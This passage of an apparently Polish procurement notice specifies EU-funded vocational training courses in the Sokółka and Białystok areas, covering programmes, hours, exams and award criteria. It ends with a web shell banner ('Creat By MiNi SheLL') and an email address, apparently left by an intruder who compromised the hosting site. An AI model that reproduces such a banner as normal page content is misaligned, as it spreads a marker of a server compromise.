dorosłe, pracujące (na umowach krótkoterminowych, na umowach cywilnoprawnych lub osoby ubogie pracujące), które pracują lub zamieszkują w rozumieniu Kodeksu Cywilnego w powiecie sokólskim•	Miejsce realizacji: Sokółka lub powiat sokólski•	Termin realizacji: od podpisania umowy do 31 grudnia 2020 roku a w przypadku przedłu-żenia okresu realizacji projektu z przyczyn COVID-19 do 31 marca 2021 roku. •	Liczba godzin: 35-40•	Liczba uczestników: 5-8 osób•	Przykładowy program szkolenia (szkolenie powinno uwzględniać co najmniej poniższe za-gadnienia): Budowa instalacji elektroenergetycznych; Montaż instalacji elektroenergetycz-nych; Eksploatacja instalacji elektroenergetycznych; Bezpieczeństwo; Przepisy dodatkowe dla dozoru •	Egzamin: Szkolenie kończy się egzaminem przed Kwalifikacyjną Komisją Energetyczną potwierdzającym nabycie kwalifikacji uprawniających do obsługi i konserwacji urządzeń, instalacji i sieci elektroenergetycznych napięciu nie wyższym niż 1 kV.1.6.	Pracownik salonu kosmetycznego z obsługą autoklawu (12 osób)•	Grupa docelowa: osoby dorosłe, pracujące (na umowach krótkoterminowych, na umowach cywilnoprawnych lub osoby ubogie pracujące), które pracują lub zamieszkują w rozumieniu Kodeksu Cywilnego w powiecie sokólskim•	Miejsce realizacji: Sokółka lub powiat sokólski•	Termin realizacji: od podpisania umowy do 31 grudnia 2020 roku a w przypadku przedłu-żenia okresu realizacji projektu z przyczyn COVID-19 do 31 marca 2021 roku. •	Liczba godzin: 50-60•	Liczba uczestników: 8-12 osób•	Przykładowy program szkolenia (szkolenie powinno uwzględniać co najmniej poniższe za-gadnienia): Prowadzenie recepcji salonu kosmetycznego, obsługa klienta; Manicure kla-syczny; Manicure hybrydowy; Zabiegi pielęgnacyjne twarzy; Przedłużanie paznokci meto-dą żelową; Obsługa autoklawu •	Egzamin: Szkolenie kończy się egzaminem przed Kwalifikacyjną Komisją Energetyczną potwierdzającym nabycie kwalifikacji uprawniających do obsługi autoklawu.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>80530000-8, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2021-03-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena ofertowa </td><td style="border: 1px solid black;border-collapse: collapse;">50,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin uruchomienia szkolenia (T)</td><td style="border: 1px solid black;border-collapse: collapse;">10,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Zapewnienie (udostępnienie, użyczenia) urządzeń z dostępem do Internetu do nauki zdalnej (U)</td><td style="border: 1px solid black;border-collapse: collapse;">15,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Doświadczenie trenerów w pracy ze specyficznym uczestnikiem szkolenia (D)</td><td style="border: 1px solid black;border-collapse: collapse;">10,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Biuro obsługi uczestnika szkoleń (B)</td><td style="border: 1px solid black;border-collapse: collapse;">15,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>II część zamówienia: przedmiotem zamówienia jest usługa realizacji szkoleń dla uczestników w zakresie szkoleń (Białystok, powiat białostocki):</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>II część zamówienia (Białystok, powiat białostocki: 153 osoby): 2.1.	ECDL BASE (12 osób)•	Grupa docelowa: osoby dorosłe, pracujące (na umowach krótkoterminowych, na umowach cywilnoprawnych lub osoby ubogie pracujące), które pracują lub zamieszkują w rozumieniu Kodeksu Cywilnego w powiecie białostockim lub w mieście Białystok•	Miejsce realizacji: Białystok lub powiat białostocki•	Termin realizacji: od podpisania umowy do 31 grudnia 2020 roku a w przypadku przedłu-żenia okresu realizacji projektu z przyczyn COVID-19 do 31 marca 2021 roku. •	Liczba godzin: 80•	Liczba uczestników: 8-12 osób•	Przykładowy program szkolenia (szkolenie powinno uwzględniać co najmniej poniższe za-gadnienia): Podstawy pracy z komputerem; Przetwarzanie tekstów; Arkusze kalkulacyjne; Podstawy pracy w sieci •	Egzamin: Szkolenie kończy się egzaminem potwierdzającym nabycie kwalifikacji, zgodnie z załącznikiem nr 8 Wytycznych Ministerstwa Rozwoju MR/2014- 2020/13(03) — słu-chacz uzyska kwalifikacje obsługi komputera, umożliwiającej korzystanie z komputera w codziennych sytuacjach, w życiu zawodowym i prywatnym.2.2.	Prowadzenie sklepu internetowego (33 osób)•	Grupa docelowa: osoby dorosłe, pracujące (na umowach krótkoterminowych, na umowach cywilnoprawnych lub osoby ubogie pracujące), które pracują lub zamieszkują w rozumieniu Kodeksu Cywilnego w powiecie białostockim lub w mieście Białystok•	Miejsce realizacji: Białystok lub powiat białostocki•	Termin realizacji: od podpisania umowy do 31 grudnia 2020 roku a w przypadku przedłu-żenia okresu realizacji projektu z przyczyn COVID-19 do 31 marca 2021 roku. •	Liczba godzin: 35-40•	Liczba uczestników: 27-33 osób•	Przykładowy program szkolenia (szkolenie powinno uwzględniać co najmniej poniższe za-gadnienia): Sprzedaż internetowa; Współpraca z programami magazynowymi; Realizacja zamówienia, kanały kontaktu z klientem; Powiązanie sklepu z aukcjami Allegro; Podsta-wowa konfiguracja sklepu o Zakładanie sklepu internetowego na platformie Shoper; Naj-ważniejsze elementy sklepu internetowego o Tworzenie i dodawanie asortymentu sklepu; Zarządzanie zamówieniami; Konfiguracja opcji wysyłki i płatności •	Egzamin: Szkolenie kończy się egzaminem potwierdzającym nabycie kwalifikacji, zgodnie z załącznikiem nr 8 Wytycznych Ministerstwa Rozwoju MR/2014- 2020/13(03) – słuchacz uzyska kwalifikacje do prowadzenia sklepu internetowego w pełnym zakresie.2.3.	Cukiernik (12 osób)•	Grupa docelowa: osoby dorosłe, pracujące (na umowach krótkoterminowych, na umowach cywilnoprawnych lub osoby ubogie pracujące), które pracują lub zamieszkują w rozumieniu Kodeksu Cywilnego w powiecie białostockim lub w mieście Białystok•	Miejsce realizacji: Białystok lub powiat białostocki•	Termin realizacji: od podpisania umowy do 31 grudnia 2020 roku a w przypadku przedłu-żenia okresu realizacji projektu z przyczyn COVID-19 do 31 marca 2021 roku. •	Liczba godzin: 80•	Liczba uczestników: 8-12 osób•	Przykładowy program szkolenia (szkolenie powinno uwzględniać co najmniej poniższe za-gadnienia): Bezpieczeństwo i higiena pracy; Surowce gastronomiczne; Technologia gastro-nomiczna; Podstawy żywienia •	Egzamin: Szkolenie kończy się egzaminem potwierdzającym nabycie kwalifikacji, zgodnie z załącznikiem nr 8 Wytycznych Ministerstwa Rozwoju MR/2014- 2020/13(03) – słuchacz uzyska kwalifikacje do wyrobu artykułów cukierniczych.2.4.	Grafik komputerowy. Adobe Photoshop, Corel Draw (12 osób)•	Grupa docelowa: osoby dorosłe, pracujące (na umowach krótkoterminowych, na umowach cywilnoprawnych lub osoby ubogie pracujące), które pracują lub zamieszkują w rozumieniu Kodeksu Cywilnego w powiecie białostockim lub w mieście Białystok•	Miejsce realizacji: Białystok lub powiat białostocki•	Termin realizacji: od podpisania umowy do 31 grudnia 2020 roku a w przypadku przedłu-żenia okresu realizacji projektu z przyczyn COVID-19 do 31 marca 2021 roku. •	Liczba godzin: 60•	Liczba uczestników: 8-12 osób•	Przykładowy program szkolenia (szkolenie powinno uwzględniać co najmniej poniższe za-gadnienia): Adobe Photoshop; Corel Draw •	Egzamin: Szkolenie kończy się egzaminem potwierdzającym nabycie kwalifikacji, zgodnie z załącznikiem nr 8 Wytycznych Ministerstwa Rozwoju MR/2014- 2020/13(03) – słuchacz uzyska kwalifikacje do obsługi programów graficznych Adobe Photoshop i Corel Draw.2.5.	Spawanie metodą MAG-135 (8 osób)•	Grupa docelowa: osoby dorosłe, pracujące (na umowach krótkoterminowych, na umowach cywilnoprawnych lub osoby ubogie pracujące), które pracują lub zamieszkują w rozumieniu Kodeksu Cywilnego w powiecie białostockim lub w mieście Białystok•	Miejsce realizacji: Białystok lub powiat białostocki•	Termin realizacji: od podpisania umowy do 31 grudnia 2020 roku a w przypadku przedłu-żenia okresu realizacji projektu z przyczyn COVID-19 do 31 marca 2021 roku. •	Liczba godzin: 140-150•	Liczba uczestników: 6-8 osób•	Przykładowy program szkolenia (szkolenie powinno uwzględniać co najmniej poniższe za-gadnienia): Procesy spajania i pokrewne spawaniu; Rysunek techniczny w spawalnictwie; Materiały podstawowe; Materiały dodatkowe; Podstawy elektrotechniki; Urządzenia i sprzęt do spawania; Technika i technologia spawania; Niezgodności spawalnicze, kontrola i badania złączy spawanych; Konstrukcje spawane i jakość w spawalnictwie; Szkolenie, eg-zaminowanie, kwalifikowanie, certyfikowanie i uprawnienia spawaczy; Przepisy, wytyczne i normy dotyczące spawalnictwa; BHP i PPOŻ przy pracach spawalniczych; Instruktaż wstępny; Ćwiczenia praktyczne•	Egzamin: Szkolenie kończy się egzaminem przeprowadzanym zgodnie z wytycznymi In-stytutu Spawalnictwa w Gliwicach (W-14/IS-17) i pod merytorycznym nadzorem Instytu-tu.2.6.	Spawanie metodą TIG-141 (8 osób)•	Grupa docelowa: osoby dorosłe, pracujące (na umowach krótkoterminowych, na umowach cywilnoprawnych lub osoby ubogie pracujące), które pracują lub zamieszkują w rozumieniu Kodeksu Cywilnego w powiecie białostockim lub w mieście Białystok•	Miejsce realizacji: Białystok lub powiat białostocki•	Termin realizacji: od podpisania umowy do 31 grudnia 2020 roku a w przypadku przedłu-żenia okresu realizacji projektu z przyczyn COVID-19 do 31 marca 2021 roku. •	Liczba godzin: 140-150•	Liczba uczestników: 6-8 osób•	Przykładowy program szkolenia (szkolenie powinno uwzględniać co najmniej poniższe za-gadnienia): Procesy spajania i pokrewne spawaniu oraz rysunek techniczny w spawalnic-twie; Rysunek techniczny w spawalnictwie o Materiały podstawowe; Materiały dodatko-we; Urządzenia i sprzęt do spawania o Technika i technologia spawania; Niezgodności spawalnicze, kontrola i badania złączy spawanych o Konstrukcje spawane i jakość w spa-walnictwie; Szkolenie, egzaminowanie, kwalifikowanie, certyfikowanie i uprawnienia spa-waczy; Przepisy, wytyczne i normy dotyczące spawalnictwa; BHP i PPOŻ przy pracach spawalniczych; Instruktaż wstępny; Ćwiczenia praktyczne•	Egzamin: Szkolenie kończy się egzaminem przeprowadzanym zgodnie z wytycznymi In-stytutu Spawalnictwa w Gliwicach (W-14/IS-17) i pod merytorycznym nadzorem Instytu-tu.2.7.	Pracownik administracyjno-biurowy. Obsługa sekretariatu (24 osoby)•	Grupa docelowa: osoby dorosłe, pracujące (na umowach krótkoterminowych, na umowach cywilnoprawnych lub osoby ubogie pracujące), które pracują lub zamieszkują w rozumieniu Kodeksu Cywilnego w powiecie białostockim lub w mieście Białystok•	Miejsce realizacji: Białystok lub powiat białostocki•	Termin realizacji: od podpisania umowy do 31 grudnia 2020 roku a w przypadku przedłu-żenia okresu realizacji projektu z przyczyn COVID-19 do 31 marca 2021 roku. •	Liczba godzin: 60•	Liczba uczestników: 18-24 osób•	Przykładowy program szkolenia (szkolenie powinno uwzględniać co najmniej poniższe za-gadnienia): Obsługa urządzeń biurowych; Podstawy obsługi komputera; Archiwizacja do-kumentacji; Kreowanie wizerunku, zasady dress-code; Organizacja czasu i miejsca pracy; Podstawy komunikacji w organizacji oraz komunikacja z klientem; Organizacja narad, spo-tkań; Prowadzenie korespondencji; Kontakty z klientami i partnerami firmy; Współpraca w grupie i z przełożonymi•	Egzamin: Szkolenie kończy się egzaminem potwierdzającym nabycie kwalifikacji, zgodnie z załącznikiem nr 8 Wytycznych Ministerstwa Rozwoju MR/2014- 2020/13(03) – słuchacz uzyska kwalifikacje do profesjonalnej obsługi biura i sekretariatu.2.8.	Szkoła wizażu (12 osób)•	Grupa docelowa: osoby dorosłe, pracujące (na umowach krótkoterminowych, na umowach cywilnoprawnych lub osoby ubogie pracujące), które pracują lub zamieszkują w rozumieniu Kodeksu Cywilnego w powiecie białostockim lub w mieście Białystok•	Miejsce realizacji: Białystok lub powiat białostocki•	Termin realizacji: od podpisania umowy do 31 grudnia 2020 roku a w przypadku przedłu-żenia okresu realizacji projektu z przyczyn COVID-19 do 31 marca 2021 roku. •	Liczba godzin: 80•	Liczba uczestników: 8-12 osób•	Przykładowy program szkolenia (szkolenie powinno uwzględniać co najmniej poniższe za-gadnienia): Wizaż w pracy kosmetyczki; Pracownia wizażu•	Egzamin: Szkolenie kończy się egzaminem potwierdzającym nabycie kwalifikacji, zgodnie z załącznikiem nr 8 Wytycznych Ministerstwa Rozwoju MR/2014- 2020/13(03) – słuchacz uzyska kwalifikacje do wykonywania profesjonalnego makijażu.2.9.	Kelner barman, barista (12 osób)•	Grupa docelowa: osoby dorosłe, pracujące (na umowach krótkoterminowych, na umowach cywilnoprawnych lub osoby ubogie pracujące), które pracują lub zamieszkują w rozumieniu Kodeksu Cywilnego w powiecie białostockim lub w mieście Białystok•	Miejsce realizacji: Białystok lub powiat białostocki•	Termin realizacji: od podpisania umowy do 31 grudnia 2020 roku a w przypadku przedłu-żenia okresu realizacji projektu z przyczyn COVID-19 do 31 marca 2021 roku. •	Liczba godzin: 50•	Liczba uczestników: 8-12 osób•	Przykładowy program szkolenia (szkolenie powinno uwzględniać co najmniej poniższe za-gadnienia): Zarys historyczny i sylwetka barmana; Organizacja pracy w barze; Towaro-znawstwo i technologia napojów; Przygotowywanie i serwowanie napojów alkoholowych i bezalkoholowych; Charakterystyka podstawowych alkoholi w barze; Klasyfikacja napojów mieszanych; Przykładowe receptury koktajli; Kultura spożywania napojów alkoholowych; Praktyczna nauka przygotowywania napojów mieszanych-shakerowanych; Podstawy pracy baristy; Kawa - podstawowe informacje; Urządzenia i akcesoria baristy; Przygotowywanie napoi gorących; Praktyczne umiejętności kelnerskie•	Egzamin: Szkolenie kończy się egzaminem potwierdzającym nabycie kwalifikacji, zgodnie z załącznikiem nr 8 Wytycznych Ministerstwa Rozwoju MR/2014- 2020/13(03) – słuchacz uzyska kwalifikacje do profesjonalnego sporządzania napojów alkoholowych i bezalkoho-lowych oraz kelnerskiej obsługi klienta.2.10.	Obsługa wózków jezdniowych o napędzie silnikowym z wymianą butli gazowych w wóz-kach zasilanych gazem (12 osób)•	Grupa docelowa: osoby dorosłe, pracujące (na umowach krótkoterminowych, na umowach cywilnoprawnych lub osoby ubogie pracujące), które pracują lub zamieszkują w rozumieniu Kodeksu Cywilnego w powiecie białostockim lub w mieście Białystok•	Miejsce realizacji: Białystok lub powiat białostocki•	Termin realizacji: od podpisania umowy do 31 grudnia 2020 roku a w przypadku przedłu-żenia okresu realizacji projektu z przyczyn COVID-19 do 31 marca 2021 roku. •	Liczba godzin: 35-40•	Liczba uczestników: 8-12 osób•	Przykładowy program szkolenia (szkolenie powinno uwzględniać co najmniej poniższe za-gadnienia): Podstawy prawne dotyczące użytkowania wózków jezdniowych; Podział wóz-ków jezdniowych i ich parametry eksploatacyjne; Stateczność i zdolność udźwigowa wóz-ka podnośnikowego; Budowa układu jezdnego wózka; Mechanizmy podnoszenia wózka podnośnikowego i wymagania wobec ich elementów; Układ hydrauliczny wózka podno-śnikowego; Urządzenia zabezpieczające w wózkach jezdniowych; Czynności obsługowe przed rozpoczęciem pracy; Czynności obsługowe podczas pracy wózkiem jezdniowym i po jej zakończeniu; Praca wózkiem jezdniowym w warunkach szczególnych; Zasady eksploat-acji wózków jezdniowych zasilanych gazem - wymiana butli gazowych; Warunki bezpiecz-nej pracy i BHP przy obsłudze wózków; Procedury postępowania w przypadku nieszczę-śliwego zdarzenia, wypadku lub pożaru; Praktyczne czynności obsługowe i jazda wózkiem jezdniowym podnośnikowym •	Egzamin: Szkolenie kończy się egzaminem przed komisją UDT potwierdzającym nabycie kwalifikacji uprawniających do obsługi wózków jezdniowych zgodnie z ustawą z dnia 21 grudnia 2000 r. o dozorze technicznym oraz rozporządzeniem Ministra Przedsiębiorczości i Technologii z dnia 21 maja 2019 r. w sprawie sposobu i trybu sprawdzania kwalifikacji wymaganych przy obsłudze i konserwacji urządzeń technicznych oraz sposobu i trybu przedłużania okresu ważności zaświadczeń kwalifikacyjnych oraz Kwalifikacyjną Komisją Energetyczną potwierdzającym nabycie kwalifikacji uprawniających do obsługi urządzeń i instalacji gazowych o ciśnieniu powyżej 5 kP2.11.	Intendent w placówkach oświatowych (8 osób)•	Grupa docelowa: osoby dorosłe, pracujące (na umowach krótkoterminowych, na umowach cywilnoprawnych lub osoby ubogie pracujące), które pracują lub zamieszkują w rozumieniu Kodeksu Cywilnego w powiecie białostockim lub w mieście Białystok•	Miejsce realizacji: Białystok lub powiat białostocki•	Termin realizacji: od podpisania umowy do 31 grudnia 2020 roku a w przypadku przedłu-żenia okresu realizacji projektu z przyczyn COVID-19 do 31 marca 2021 roku. •	Liczba godzin: 24•	Liczba uczestników: 6-8 osób•	Przykładowy program szkolenia (szkolenie powinno uwzględniać co najmniej poniższe za-gadnienia): Obowiązujące przepisy prawne: Kodeks Pracy, Prawo zamówień publicznych, bezpieczeństwo zdrowotne żywności; Realizacja wymagań sanitarnych i higienicznych; Za-sady GHP i GMP oraz elementy HACCP; Prowadzenie gospodarki finansowej, materiało-wej i magazynowej stołówki i kuchni szkolnej prowadzenie zaopatrzenia w artykuły żyw-nościowe, spożywcze i chemiczne - dokumentacja intendenta; Układanie jadłospisów•	Egzamin: Szkolenie kończy się egzaminem potwierdzającym nabycie kwalifikacji, zgodnie z załącznikiem nr 8 Wytycznych Ministerstwa Rozwoju MR/2014- 2020/13(03) – słuchacz uzyska kwalifikacje do organizacji zbiorowego żywienia i pracy stołówki.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>80530000-8, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2021-03-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena ofertowa</td><td style="border: 1px solid black;border-collapse: collapse;">50,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin uruchomienia szkolenia (T)</td><td style="border: 1px solid black;border-collapse: collapse;">10,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Zapewnienie (udostępnienie, użyczenia) urządzeń z dostępem do Internetu do nauki zdalnej (U)</td><td style="border: 1px solid black;border-collapse: collapse;">15,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Doświadczenie trenerów w pracy ze specyficznym uczestnikiem szkolenia (D)</td><td style="border: 1px solid black;border-collapse: collapse;">10,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Biuro obsługi uczestnika szkoleń (B)</td><td style="border: 1px solid black;border-collapse: collapse;">15,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com